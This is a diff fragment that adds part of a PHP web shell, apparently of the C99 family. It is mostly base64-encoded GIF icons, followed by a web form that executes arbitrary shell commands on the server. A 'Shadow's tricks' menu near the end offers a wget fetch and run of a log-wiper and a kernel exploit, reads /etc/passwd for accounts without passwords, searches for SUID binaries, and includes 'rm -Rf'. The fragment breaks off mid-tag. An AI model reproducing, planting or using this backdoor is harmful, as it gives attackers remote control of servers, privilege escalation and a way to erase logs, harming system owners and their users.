+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} +?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Useful Commands + </div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? + <OPTION VALUE="which wget curl w3m lynx">Downloaders? + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE="locate gcc">gcc installed? + <OPTION VALUE="rm -Rf">Format box (DANGEROUS) + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) + <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 + <OPTION VALUE="./zap2">WIPELOGS PT3 + <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) + <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) + <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) + <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) + <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) + <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) + </SELECT> + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input 